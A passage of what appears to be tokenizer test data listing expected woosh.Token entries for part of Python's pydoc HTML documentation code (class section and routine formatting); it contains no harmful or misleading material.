woosh.Token(woosh.STRING, '"Readonly properties %s"', 977, 37, 977, 61),
woosh.Token(woosh.OP, '%', 977, 62, 977, 63),
woosh.Token(woosh.NAME, 'tag', 977, 64, 977, 67),
woosh.Token(woosh.OP, ',', 977, 67, 977, 68),
woosh.Token(woosh.NAME, 'attrs', 977, 69, 977, 74),
woosh.Token(woosh.OP, ',', 977, 74, 977, 75),
woosh.Token(woosh.NAME, 'lambda', 978, 37, 978, 43),
woosh.Token(woosh.NAME, 't', 978, 44, 978, 45),
woosh.Token(woosh.OP, ':', 978, 45, 978, 46),
woosh.Token(woosh.NAME, 't', 978, 47, 978, 48),
woosh.Token(woosh.OP, '[', 978, 48, 978, 49),
woosh.Token(woosh.NUMBER, '1', 978, 49, 978, 50),
woosh.Token(woosh.OP, ']', 978, 50, 978, 51),
woosh.Token(woosh.OP, '==', 978, 52, 978, 54),
woosh.Token(woosh.STRING, "'readonly property'", 978, 55, 978, 74),
woosh.Token(woosh.OP, ')', 978, 74, 978, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 978, 75, 979, 0),
woosh.Token(woosh.NAME, 'attrs', 979, 12, 979, 17),
woosh.Token(woosh.OP, '=', 979, 18, 979, 19),
woosh.Token(woosh.NAME, 'spilldescriptors', 979, 20, 979, 36),
woosh.Token(woosh.OP, '(', 979, 36, 979, 37),
woosh.Token(woosh.STRING, "'Data descriptors %s'", 979, 37, 979, 58),
woosh.Token(woosh.OP, '%', 979, 59, 979, 60),
woosh.Token(woosh.NAME, 'tag', 979, 61, 979, 64),
woosh.Token(woosh.OP, ',', 979, 64, 979, 65),
woosh.Token(woosh.NAME, 'attrs', 979, 66, 979, 71),
woosh.Token(woosh.OP, ',', 979, 71, 979, 72),
woosh.Token(woosh.NAME, 'lambda', 980, 37, 980, 43),
woosh.Token(woosh.NAME, 't', 980, 44, 980, 45),
woosh.Token(woosh.OP, ':', 980, 45, 980, 46),
woosh.Token(woosh.NAME, 't', 980, 47, 980, 48),
woosh.Token(woosh.OP, '[', 980, 48, 980, 49),
woosh.Token(woosh.NUMBER, '1', 980, 49, 980, 50),
woosh.Token(woosh.OP, ']', 980, 50, 980, 51),
woosh.Token(woosh.OP, '==', 980, 52, 980, 54),
woosh.Token(woosh.STRING, "'data descriptor'", 980, 55, 980, 72),
woosh.Token(woosh.OP, ')', 980, 72, 980, 73),
woosh.Token(woosh.NEWLINE, '\r\n', 980, 73, 981, 0),
woosh.Token(woosh.NAME, 'attrs', 981, 12, 981, 17),
woosh.Token(woosh.OP, '=', 981, 18, 981, 19),
woosh.Token(woosh.NAME, 'spilldata', 981, 20, 981, 29),
woosh.Token(woosh.OP, '(', 981, 29, 981, 30),
woosh.Token(woosh.STRING, "'Data and other attributes %s'", 981, 30, 981, 60),
woosh.Token(woosh.OP, '%', 981, 61, 981, 62),
woosh.Token(woosh.NAME, 'tag', 981, 63, 981, 66),
woosh.Token(woosh.OP, ',', 981, 66, 981, 67),
woosh.Token(woosh.NAME, 'attrs', 981, 68, 981, 73),
woosh.Token(woosh.OP, ',', 981, 73, 981, 74),
woosh.Token(woosh.NAME, 'lambda', 982, 30, 982, 36),
woosh.Token(woosh.NAME, 't', 982, 37, 982, 38),
woosh.Token(woosh.OP, ':', 982, 38, 982, 39),
woosh.Token(woosh.NAME, 't', 982, 40, 982, 41),
woosh.Token(woosh.OP, '[', 982, 41, 982, 42),
woosh.Token(woosh.NUMBER, '1', 982, 42, 982, 43),
woosh.Token(woosh.OP, ']', 982, 43, 982, 44),
woosh.Token(woosh.OP, '==', 982, 45, 982, 47),
woosh.Token(woosh.STRING, "'data'", 982, 48, 982, 54),
woosh.Token(woosh.OP, ')', 982, 54, 982, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 982, 55, 983, 0),
woosh.Token(woosh.NAME, 'assert', 983, 12, 983, 18),
woosh.Token(woosh.NAME, 'attrs', 983, 19, 983, 24),
woosh.Token(woosh.OP, '==', 983, 25, 983, 27),
woosh.Token(woosh.OP, '[', 983, 28, 983, 29),
woosh.Token(woosh.OP, ']', 983, 29, 983, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 983, 30, 984, 0),
woosh.Token(woosh.NAME, 'attrs', 984, 12, 984, 17),
woosh.Token(woosh.OP, '=', 984, 18, 984, 19),
woosh.Token(woosh.NAME, 'inherited', 984, 20, 984, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 984, 29, 985, 0),
woosh.Token(woosh.DEDENT, ' ', 986, 0, 986, 8),
woosh.Token(woosh.NAME, 'contents', 986, 8, 986, 16),
woosh.Token(woosh.OP, '=', 986, 17, 986, 18),
woosh.Token(woosh.STRING, "''", 986, 19, 986, 21),
woosh.Token(woosh.OP, '.', 986, 21, 986, 22),
woosh.Token(woosh.NAME, 'join', 986, 22, 986, 26),
woosh.Token(woosh.OP, '(', 986, 26, 986, 27),
woosh.Token(woosh.NAME, 'contents', 986, 27, 986, 35),
woosh.Token(woosh.OP, ')', 986, 35, 986, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 986, 36, 987, 0),
woosh.Token(woosh.NAME, 'if', 988, 8, 988, 10),
woosh.Token(woosh.NAME, 'name', 988, 11, 988, 15),
woosh.Token(woosh.OP, '==', 988, 16, 988, 18),
woosh.Token(woosh.NAME, 'realname', 988, 19, 988, 27),
woosh.Token(woosh.OP, ':', 988, 27, 988, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 988, 28, 989, 0),
woosh.Token(woosh.INDENT, ' ', 989, 0, 989, 12),
woosh.Token(woosh.NAME, 'title', 989, 12, 989, 17),
woosh.Token(woosh.OP, '=', 989, 18, 989, 19),
woosh.Token(woosh.STRING, '\'<a name="%s">class <strong>%s</strong></a>\'', 989, 20, 989, 64),
woosh.Token(woosh.OP, '%', 989, 65, 989, 66),
woosh.Token(woosh.OP, '(', 989, 67, 989, 68),
woosh.Token(woosh.NAME, 'name', 990, 16, 990, 20),
woosh.Token(woosh.OP, ',', 990, 20, 990, 21),
woosh.Token(woosh.NAME, 'realname', 990, 22, 990, 30),
woosh.Token(woosh.OP, ')', 990, 30, 990, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 990, 31, 991, 0),
woosh.Token(woosh.DEDENT, ' ', 991, 0, 991, 8),
woosh.Token(woosh.NAME, 'else', 991, 8, 991, 12),
woosh.Token(woosh.OP, ':', 991, 12, 991, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 991, 13, 992, 0),
woosh.Token(woosh.INDENT, ' ', 992, 0, 992, 12),
woosh.Token(woosh.NAME, 'title', 992, 12, 992, 17),
woosh.Token(woosh.OP, '=', 992, 18, 992, 19),
woosh.Token(woosh.STRING, '\'<strong>%s</strong> = <a name="%s">class %s</a>\'', 992, 20, 992, 69),
woosh.Token(woosh.OP, '%', 992, 70, 992, 71),
woosh.Token(woosh.OP, '(', 992, 72, 992, 73),
woosh.Token(woosh.NAME, 'name', 993, 16, 993, 20),
woosh.Token(woosh.OP, ',', 993, 20, 993, 21),
woosh.Token(woosh.NAME, 'name', 993, 22, 993, 26),
woosh.Token(woosh.OP, ',', 993, 26, 993, 27),
woosh.Token(woosh.NAME, 'realname', 993, 28, 993, 36),
woosh.Token(woosh.OP, ')', 993, 36, 993, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 993, 37, 994, 0),
woosh.Token(woosh.DEDENT, ' ', 994, 0, 994, 8),
woosh.Token(woosh.NAME, 'if', 994, 8, 994, 10),
woosh.Token(woosh.NAME, 'bases', 994, 11, 994, 16),
woosh.Token(woosh.OP, ':', 994, 16, 994, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 994, 17, 995, 0),
woosh.Token(woosh.INDENT, ' ', 995, 0, 995, 12),
woosh.Token(woosh.NAME, 'parents', 995, 12, 995, 19),
woosh.Token(woosh.OP, '=', 995, 20, 995, 21),
woosh.Token(woosh.OP, '[', 995, 22, 995, 23),
woosh.Token(woosh.OP, ']', 995, 23, 995, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 995, 24, 996, 0),
woosh.Token(woosh.NAME, 'for', 996, 12, 996, 15),
woosh.Token(woosh.NAME, 'base', 996, 16, 996, 20),
woosh.Token(woosh.NAME, 'in', 996, 21, 996, 23),
woosh.Token(woosh.NAME, 'bases', 996, 24, 996, 29),
woosh.Token(woosh.OP, ':', 996, 29, 996, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 996, 30, 997, 0),
woosh.Token(woosh.INDENT, ' ', 997, 0, 997, 16),
woosh.Token(woosh.NAME, 'parents', 997, 16, 997, 23),
woosh.Token(woosh.OP, '.', 997, 23, 997, 24),
woosh.Token(woosh.NAME, 'append', 997, 24, 997, 30),
woosh.Token(woosh.OP, '(', 997, 30, 997, 31),
woosh.Token(woosh.NAME, 'self', 997, 31, 997, 35),
woosh.Token(woosh.OP, '.', 997, 35, 997, 36),
woosh.Token(woosh.NAME, 'classlink', 997, 36, 997, 45),
woosh.Token(woosh.OP, '(', 997, 45, 997, 46),
woosh.Token(woosh.NAME, 'base', 997, 46, 997, 50),
woosh.Token(woosh.OP, ',', 997, 50, 997, 51),
woosh.Token(woosh.NAME, 'object', 997, 52, 997, 58),
woosh.Token(woosh.OP, '.', 997, 58, 997, 59),
woosh.Token(woosh.NAME, '__module__', 997, 59, 997, 69),
woosh.Token(woosh.OP, ')', 997, 69, 997, 70),
woosh.Token(woosh.OP, ')', 997, 70, 997, 71),
woosh.Token(woosh.NEWLINE, '\r\n', 997, 71, 998, 0),
woosh.Token(woosh.DEDENT, ' ', 998, 0, 998, 12),
woosh.Token(woosh.NAME, 'title', 998, 12, 998, 17),
woosh.Token(woosh.OP, '=', 998, 18, 998, 19),
woosh.Token(woosh.NAME, 'title', 998, 20, 998, 25),
woosh.Token(woosh.OP, '+', 998, 26, 998, 27),
woosh.Token(woosh.STRING, "'(%s)'", 998, 28, 998, 34),
woosh.Token(woosh.OP, '%', 998, 35, 998, 36),
woosh.Token(woosh.STRING, "', '", 998, 37, 998, 41),
woosh.Token(woosh.OP, '.', 998, 41, 998, 42),
woosh.Token(woosh.NAME, 'join', 998, 42, 998, 46),
woosh.Token(woosh.OP, '(', 998, 46, 998, 47),
woosh.Token(woosh.NAME, 'parents', 998, 47, 998, 54),
woosh.Token(woosh.OP, ')', 998, 54, 998, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 998, 55, 999, 0),
woosh.Token(woosh.DEDENT, ' ', 1000, 0, 1000, 8),
woosh.Token(woosh.NAME, 'decl', 1000, 8, 1000, 12),
woosh.Token(woosh.OP, '=', 1000, 13, 1000, 14),
woosh.Token(woosh.STRING, "''", 1000, 15, 1000, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 1000, 17, 1001, 0),
woosh.Token(woosh.NAME, 'try', 1001, 8, 1001, 11),
woosh.Token(woosh.OP, ':', 1001, 11, 1001, 12),
woosh.Token(woosh.NEWLINE, '\r\n', 1001, 12, 1002, 0),
woosh.Token(woosh.INDENT, ' ', 1002, 0, 1002, 12),
woosh.Token(woosh.NAME, 'signature', 1002, 12, 1002, 21),
woosh.Token(woosh.OP, '=', 1002, 22, 1002, 23),
woosh.Token(woosh.NAME, 'inspect', 1002, 24, 1002, 31),
woosh.Token(woosh.OP, '.', 1002, 31, 1002, 32),
woosh.Token(woosh.NAME, 'signature', 1002, 32, 1002, 41),
woosh.Token(woosh.OP, '(', 1002, 41, 1002, 42),
woosh.Token(woosh.NAME, 'object', 1002, 42, 1002, 48),
woosh.Token(woosh.OP, ')', 1002, 48, 1002, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 1002, 49, 1003, 0),
woosh.Token(woosh.DEDENT, ' ', 1003, 0, 1003, 8),
woosh.Token(woosh.NAME, 'except', 1003, 8, 1003, 14),
woosh.Token(woosh.OP, '(', 1003, 15, 1003, 16),
woosh.Token(woosh.NAME, 'ValueError', 1003, 16, 1003, 26),
woosh.Token(woosh.OP, ',', 1003, 26, 1003, 27),
woosh.Token(woosh.NAME, 'TypeError', 1003, 28, 1003, 37),
woosh.Token(woosh.OP, ')', 1003, 37, 1003, 38),
woosh.Token(woosh.OP, ':', 1003, 38, 1003, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 1003, 39, 1004, 0),
woosh.Token(woosh.INDENT, ' ', 1004, 0, 1004, 12),
woosh.Token(woosh.NAME, 'signature', 1004, 12, 1004, 21),
woosh.Token(woosh.OP, '=', 1004, 22, 1004, 23),
woosh.Token(woosh.NAME, 'None', 1004, 24, 1004, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 1004, 28, 1005, 0),
woosh.Token(woosh.DEDENT, ' ', 1005, 0, 1005, 8),
woosh.Token(woosh.NAME, 'if', 1005, 8, 1005, 10),
woosh.Token(woosh.NAME, 'signature', 1005, 11, 1005, 20),
woosh.Token(woosh.OP, ':', 1005, 20, 1005, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 1005, 21, 1006, 0),
woosh.Token(woosh.INDENT, ' ', 1006, 0, 1006, 12),
woosh.Token(woosh.NAME, 'argspec', 1006, 12, 1006, 19),
woosh.Token(woosh.OP, '=', 1006, 20, 1006, 21),
woosh.Token(woosh.NAME, 'str', 1006, 22, 1006, 25),
woosh.Token(woosh.OP, '(', 1006, 25, 1006, 26),
woosh.Token(woosh.NAME, 'signature', 1006, 26, 1006, 35),
woosh.Token(woosh.OP, ')', 1006, 35, 1006, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 1006, 36, 1007, 0),
woosh.Token(woosh.NAME, 'if', 1007, 12, 1007, 14),
woosh.Token(woosh.NAME, 'argspec', 1007, 15, 1007, 22),
woosh.Token(woosh.NAME, 'and', 1007, 23, 1007, 26),
woosh.Token(woosh.NAME, 'argspec', 1007, 27, 1007, 34),
woosh.Token(woosh.OP, '!=', 1007, 35, 1007, 37),
woosh.Token(woosh.STRING, "'()'", 1007, 38, 1007, 42),
woosh.Token(woosh.OP, ':', 1007, 42, 1007, 43),
woosh.Token(woosh.NEWLINE, '\r\n', 1007, 43, 1008, 0),
woosh.Token(woosh.INDENT, ' ', 1008, 0, 1008, 16),
woosh.Token(woosh.NAME, 'decl', 1008, 16, 1008, 20),
woosh.Token(woosh.OP, '=', 1008, 21, 1008, 22),
woosh.Token(woosh.NAME, 'name', 1008, 23, 1008, 27),
woosh.Token(woosh.OP, '+', 1008, 28, 1008, 29),
woosh.Token(woosh.NAME, 'self', 1008, 30, 1008, 34),
woosh.Token(woosh.OP, '.', 1008, 34, 1008, 35),
woosh.Token(woosh.NAME, 'escape', 1008, 35, 1008, 41),
woosh.Token(woosh.OP, '(', 1008, 41, 1008, 42),
woosh.Token(woosh.NAME, 'argspec', 1008, 42, 1008, 49),
woosh.Token(woosh.OP, ')', 1008, 49, 1008, 50),
woosh.Token(woosh.OP, '+', 1008, 51, 1008, 52),
woosh.Token(woosh.STRING, "'\\n\\n'", 1008, 53, 1008, 59),
woosh.Token(woosh.NEWLINE, '\r\n', 1008, 59, 1009, 0),
woosh.Token(woosh.DEDENT, ' ', 1010, 0, 1010, 8),
woosh.Token(woosh.DEDENT, '', 1010, 8, 1010, 8),
woosh.Token(woosh.NAME, 'doc', 1010, 8, 1010, 11),
woosh.Token(woosh.OP, '=', 1010, 12, 1010, 13),
woosh.Token(woosh.NAME, 'getdoc', 1010, 14, 1010, 20),
woosh.Token(woosh.OP, '(', 1010, 20, 1010, 21),
woosh.Token(woosh.NAME, 'object', 1010, 21, 1010, 27),
woosh.Token(woosh.OP, ')', 1010, 27, 1010, 28),
woosh.Token(woosh.NEWLINE, '\r\n', 1010, 28, 1011, 0),
woosh.Token(woosh.NAME, 'if', 1011, 8, 1011, 10),
woosh.Token(woosh.NAME, 'decl', 1011, 11, 1011, 15),
woosh.Token(woosh.OP, ':', 1011, 15, 1011, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 1011, 16, 1012, 0),
woosh.Token(woosh.INDENT, ' ', 1012, 0, 1012, 12),
woosh.Token(woosh.NAME, 'doc', 1012, 12, 1012, 15),
woosh.Token(woosh.OP, '=', 1012, 16, 1012, 17),
woosh.Token(woosh.NAME, 'decl', 1012, 18, 1012, 22),
woosh.Token(woosh.OP, '+', 1012, 23, 1012, 24),
woosh.Token(woosh.OP, '(', 1012, 25, 1012, 26),
woosh.Token(woosh.NAME, 'doc', 1012, 26, 1012, 29),
woosh.Token(woosh.NAME, 'or', 1012, 30, 1012, 32),
woosh.Token(woosh.STRING, "''", 1012, 33, 1012, 35),
woosh.Token(woosh.OP, ')', 1012, 35, 1012, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 1012, 36, 1013, 0),
woosh.Token(woosh.DEDENT, ' ', 1013, 0, 1013, 8),
woosh.Token(woosh.NAME, 'doc', 1013, 8, 1013, 11),
woosh.Token(woosh.OP, '=', 1013, 12, 1013, 13),
woosh.Token(woosh.NAME, 'self', 1013, 14, 1013, 18),
woosh.Token(woosh.OP, '.', 1013, 18, 1013, 19),
woosh.Token(woosh.NAME, 'markup', 1013, 19, 1013, 25),
woosh.Token(woosh.OP, '(', 1013, 25, 1013, 26),
woosh.Token(woosh.NAME, 'doc', 1013, 26, 1013, 29),
woosh.Token(woosh.OP, ',', 1013, 29, 1013, 30),
woosh.Token(woosh.NAME, 'self', 1013, 31, 1013, 35),
woosh.Token(woosh.OP, '.', 1013, 35, 1013, 36),
woosh.Token(woosh.NAME, 'preformat', 1013, 36, 1013, 45),
woosh.Token(woosh.OP, ',', 1013, 45, 1013, 46),
woosh.Token(woosh.NAME, 'funcs', 1013, 47, 1013, 52),
woosh.Token(woosh.OP, ',', 1013, 52, 1013, 53),
woosh.Token(woosh.NAME, 'classes', 1013, 54, 1013, 61),
woosh.Token(woosh.OP, ',', 1013, 61, 1013, 62),
woosh.Token(woosh.NAME, 'mdict', 1013, 63, 1013, 68),
woosh.Token(woosh.OP, ')', 1013, 68, 1013, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 1013, 69, 1014, 0),
woosh.Token(woosh.NAME, 'doc', 1014, 8, 1014, 11),
woosh.Token(woosh.OP, '=', 1014, 12, 1014, 13),
woosh.Token(woosh.NAME, 'doc', 1014, 14, 1014, 17),
woosh.Token(woosh.NAME, 'and', 1014, 18, 1014, 21),
woosh.Token(woosh.STRING, "'<tt>%s<br> </tt>'", 1014, 22, 1014, 45),
woosh.Token(woosh.OP, '%', 1014, 46, 1014, 47),
woosh.Token(woosh.NAME, 'doc', 1014, 48, 1014, 51),
woosh.Token(woosh.NEWLINE, '\r\n', 1014, 51, 1015, 0),
woosh.Token(woosh.NAME, 'return', 1016, 8, 1016, 14),
woosh.Token(woosh.NAME, 'self', 1016, 15, 1016, 19),
woosh.Token(woosh.OP, '.', 1016, 19, 1016, 20),
woosh.Token(woosh.NAME, 'section', 1016, 20, 1016, 27),
woosh.Token(woosh.OP, '(', 1016, 27, 1016, 28),
woosh.Token(woosh.NAME, 'title', 1016, 28, 1016, 33),
woosh.Token(woosh.OP, ',', 1016, 33, 1016, 34),
woosh.Token(woosh.STRING, "'#000000'", 1016, 35, 1016, 44),
woosh.Token(woosh.OP, ',', 1016, 44, 1016, 45),
woosh.Token(woosh.STRING, "'#ffc8d8'", 1016, 46, 1016, 55),
woosh.Token(woosh.OP, ',', 1016, 55, 1016, 56),
woosh.Token(woosh.NAME, 'contents', 1016, 57, 1016, 65),
woosh.Token(woosh.OP, ',', 1016, 65, 1016, 66),
woosh.Token(woosh.NUMBER, '3', 1016, 67, 1016, 68),
woosh.Token(woosh.OP, ',', 1016, 68, 1016, 69),
woosh.Token(woosh.NAME, 'doc', 1016, 70, 1016, 73),
woosh.Token(woosh.OP, ')', 1016, 73, 1016, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 1016, 74, 1017, 0),
woosh.Token(woosh.DEDENT, ' ', 1018, 0, 1018, 4),
woosh.Token(woosh.NAME, 'def', 1018, 4, 1018, 7),
woosh.Token(woosh.NAME, 'formatvalue', 1018, 8, 1018, 19),
woosh.Token(woosh.OP, '(', 1018, 19, 1018, 20),
woosh.Token(woosh.NAME, 'self', 1018, 20, 1018, 24),
woosh.Token(woosh.OP, ',', 1018, 24, 1018, 25),
woosh.Token(woosh.NAME, 'object', 1018, 26, 1018, 32),
woosh.Token(woosh.OP, ')', 1018, 32, 1018, 33),
woosh.Token(woosh.OP, ':', 1018, 33, 1018, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 1018, 34, 1019, 0),
woosh.Token(woosh.INDENT, ' ', 1019, 0, 1019, 8),
woosh.Token(woosh.STRING, '"""Format an argument default value as text."""', 1019, 8, 1019, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 1019, 55, 1020, 0),
woosh.Token(woosh.NAME, 'return', 1020, 8, 1020, 14),
woosh.Token(woosh.NAME, 'self', 1020, 15, 1020, 19),
woosh.Token(woosh.OP, '.', 1020, 19, 1020, 20),
woosh.Token(woosh.NAME, 'grey', 1020, 20, 1020, 24),
woosh.Token(woosh.OP, '(', 1020, 24, 1020, 25),
woosh.Token(woosh.STRING, "'='", 1020, 25, 1020, 28),
woosh.Token(woosh.OP, '+', 1020, 29, 1020, 30),
woosh.Token(woosh.NAME, 'self', 1020, 31, 1020, 35),
woosh.Token(woosh.OP, '.', 1020, 35, 1020, 36),
woosh.Token(woosh.NAME, 'repr', 1020, 36, 1020, 40),
woosh.Token(woosh.OP, '(', 1020, 40, 1020, 41),
woosh.Token(woosh.NAME, 'object', 1020, 41, 1020, 47),
woosh.Token(woosh.OP, ')', 1020, 47, 1020, 48),
woosh.Token(woosh.OP, ')', 1020, 48, 1020, 49),
woosh.Token(woosh.NEWLINE, '\r\n', 1020, 49, 1021, 0),
woosh.Token(woosh.DEDENT, ' ', 1022, 0, 1022, 4),
woosh.Token(woosh.NAME, 'def', 1022, 4, 1022, 7),
woosh.Token(woosh.NAME, 'docroutine', 1022, 8, 1022, 18),
woosh.Token(woosh.OP, '(', 1022, 18, 1022, 19),
woosh.Token(woosh.NAME, 'self', 1022, 19, 1022, 23),
woosh.Token(woosh.OP, ',', 1022, 23, 1022, 24),
woosh.Token(woosh.NAME, 'object', 1022, 25, 1022, 31),
woosh.Token(woosh.OP, ',', 1022, 31, 1022, 32),
woosh.Token(woosh.NAME, 'name', 1022, 33, 1022, 37),
woosh.Token(woosh.OP, '=', 1022, 37, 1022, 38),
woosh.Token(woosh.NAME, 'None', 1022, 38, 1022, 42),
woosh.Token(woosh.OP, ',', 1022, 42, 1022, 43),
woosh.Token(woosh.NAME, 'mod', 1022, 44, 1022, 47),
woosh.Token(woosh.OP, '=', 1022, 47, 1022, 48),
woosh.Token(woosh.NAME, 'None', 1022, 48, 1022, 52),
woosh.Token(woosh.OP, ',', 1022, 52, 1022, 53),
woosh.Token(woosh.NAME, 'funcs', 1023, 19, 1023, 24),
woosh.Token(woosh.OP, '=', 1023, 24, 1023, 25),
woosh.Token(woosh.OP, '{', 1023, 25, 1023, 26),
woosh.Token(woosh.OP, '}', 1023, 26, 1023, 27),
woosh.Token(woosh.OP, ',', 1023, 27, 1023, 28),
woosh.Token(woosh.NAME, 'classes', 1023, 29, 1023, 36),
woosh.Token(woosh.OP, '=', 1023, 36, 1023, 37),
woosh.Token(woosh.OP, '{', 1023, 37, 1023, 38),
woosh.Token(woosh.OP, '}', 1023, 38, 1023, 39),
woosh.Token(woosh.OP, ',', 1023, 39, 1023, 40),
woosh.Token(woosh.NAME, 'methods', 1023, 41, 1023, 48),
woosh.Token(woosh.OP, '=', 1023, 48, 1023, 49),
woosh.Token(woosh.OP, '{', 1023, 49, 1023, 50),
woosh.Token(woosh.OP, '}', 1023, 50, 1023, 51),
woosh.Token(woosh.OP, ',', 1023, 51, 1023, 52),
woosh.Token(woosh.NAME, 'cl', 1023, 53, 1023, 55),
woosh.Token(woosh.OP, '=', 1023, 55, 1023, 56),
woosh.Token(woosh.NAME, 'None', 1023, 56, 1023, 60),
woosh.Token(woosh.OP, ')', 1023, 60, 1023, 61),
woosh.Token(woosh.OP, ':', 1023, 61, 1023, 62),
woosh.Token(woosh.NEWLINE, '\r\n', 1023, 62, 1024, 0),
woosh.Token(woosh.INDENT, ' ', 1024, 0, 1024, 8),
woosh.Token(woosh.STRING, '"""Produce HTML documentation for a function or method object."""', 1024, 8, 1024, 73),
woosh.Token(woosh.NEWLINE, '\r\n', 1024, 73, 1025, 0),
woosh.Token(woosh.NAME, 'realname', 1025, 8, 1025, 16),
woosh.Token(woosh.OP, '=', 1025, 17, 1025, 18),
woosh.Token(woosh.NAME, 'object', 1025, 19, 1025, 25),
woosh.Token(woosh.OP, '.', 1025, 25, 1025, 26),
woosh.Token(woosh.NAME, '__name__', 1025, 26, 1025, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 1025, 34, 1026, 0),
woosh.Token(woosh.NAME, 'name', 1026, 8, 1026, 12),
woosh.Token(woosh.OP, '=', 1026, 13, 1026, 14),
woosh.Token(woosh.NAME, 'name', 1026, 15, 1026, 19),
woosh.Token(woosh.NAME, 'or', 1026, 20, 1026, 22),
woosh.Token(woosh.NAME, 'realname', 1026, 23, 1026, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 1026, 31, 1027, 0),
woosh.Token(woosh.NAME, 'anchor', 1027, 8, 1027, 14),
woosh.Token(woosh.OP, '=', 1027, 15, 1027, 16),
woosh.Token(woosh.OP, '(', 1027, 17, 1027, 18),
woosh.Token(woosh.NAME, 'cl', 1027, 18, 1027, 20),
woosh.Token(woosh.NAME, 'and', 1027, 21, 1027, 24),
woosh.Token(woosh.NAME, 'cl', 1027, 25, 1027, 27),
woosh.Token(woosh.OP, '.', 1027, 27, 1027, 28),
woosh.Token(woosh.NAME, '__name__', 1027, 28, 1027, 36),
woosh.Token(woosh.NAME, 'or', 1027, 37, 1027, 39),
woosh.Token(woosh.STRING, "''", 1027, 40, 1027, 42),
woosh.Token(woosh.OP, ')', 1027, 42, 1027, 43),
woosh.Token(woosh.OP, '+', 1027, 44, 1027, 45),
woosh.Token(woosh.STRING, "'-'", 1027, 46, 1027, 49),
woosh.Token(woosh.OP, '+', 1027, 50, 1027, 51),
woosh.Token(woosh.NAME, 'name', 1027, 52, 1027, 56),
woosh.Token(woosh.NEWLINE, '\r\n', 1027, 56, 1028, 0),
woosh.Token(woosh.NAME, 'note', 1028, 8, 1028, 12),
woosh.Token(woosh.OP, '=', 1028, 13, 1028, 14),
woosh.Token(woosh.STRING, "''", 1028, 15, 1028, 17),
woosh.Token(woosh.NEWLINE, '\r\n', 1028, 17, 1029, 0),
woosh.Token(woosh.NAME, 'skipdocs', 1029, 8, 1029, 16),
woosh.Token(woosh.OP, '=', 1029, 17, 1029, 18),
woosh.Token(woosh.NUMBER, '0', 1029, 19, 1029, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 1029, 20, 1030, 0),
woosh.Token(woosh.NAME, 'if', 1030, 8, 1030, 10),
woosh.Token(woosh.NAME, '_is_bound_method', 1030, 11, 1030, 27),
woosh.Token(woosh.OP, '(', 1030, 27, 1030, 28),
woosh.Token(woosh.NAME, 'object', 1030, 28, 1030, 34),
woosh.Token(woosh.OP, ')', 1030, 34, 1030, 35),
woosh.Token(woosh.OP, ':', 1030, 35, 1030, 36),
woosh.Token(woosh.NEWLINE, '\r\n', 1030, 36, 1031, 0),
woosh.Token(woosh.INDENT, ' ', 1031, 0, 1031, 12),
woosh.Token(woosh.NAME, 'imclass', 1031, 12, 1031, 19),
woosh.Token(woosh.OP, '=', 1031, 20, 1031, 21),
woosh.Token(woosh.NAME, 'object', 1031, 22, 1031, 28),
woosh.Token(woosh.OP, '.', 1031, 28, 1031, 29),
woosh.Token(woosh.NAME, '__self__', 1031, 29, 1031, 37),
woosh.Token(woosh.OP, '.', 1031, 37, 1031, 38),
woosh.Token(woosh.NAME, '__class__', 1031, 38, 1031, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 1031, 47, 1032, 0),
woosh.Token(woosh.NAME, 'if', 1032, 12, 1032, 14),
woosh.Token(woosh.NAME, 'cl', 1032, 15, 1032, 17),
woosh.Token(woosh.OP, ':', 1032, 17, 1032, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 1032, 18, 1033, 0),
woosh.Token(woosh.INDENT, ' ', 1033, 0, 1033, 16),
woosh.Token(woosh.NAME, 'if', 1033, 16, 1033, 18),
woosh.Token(woosh.NAME, 'imclass', 1033, 19, 1033, 26),
woosh.Token(woosh.NAME, 'is', 1033, 27, 1033, 29),
woosh.Token(woosh.NAME, 'not', 1033, 30, 1033, 33),
woosh.Token(woosh.NAME, 'cl', 1033, 34, 1033, 36),
woosh.Token(woosh.OP, ':', 1033, 36, 1033, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 1033, 37, 1034, 0),
woosh.Token(woosh.INDENT, ' ', 1034, 0, 1034, 20),
woosh.Token(woosh.NAME, 'note', 1034, 20, 1034, 24),
woosh.Token(woosh.OP, '=', 1034, 25, 1034, 26),
woosh.Token(woosh.STRING, "' from '", 1034, 27, 1034, 35),
woosh.Token(woosh.OP, '+', 1034, 36, 1034, 37),
woosh.Token(woosh.NAME, 'self', 1034, 38, 1034, 42),
woosh.Token(woosh.OP, '.', 1034, 42, 1034, 43),
woosh.Token(woosh.NAME, 'classlink', 1034, 43, 1034, 52),
woosh.Token(woosh.OP, '(', 1034, 52, 1034, 53),
woosh.Token(woosh.NAME, 'imclass', 1034, 53, 1034, 60),
woosh.Token(woosh.OP, ',', 1034, 60, 1034, 61),
woosh.Token(woosh.NAME, 'mod', 1034, 62, 1034, 65),
woosh.Token(woosh.OP, ')', 1034, 65, 1034, 66),
woosh.Token(woosh.NEWLINE, '\r\n', 1034, 66, 1035, 0),
woosh.Token(woosh.DEDENT, ' ', 1035, 0, 1035, 12),
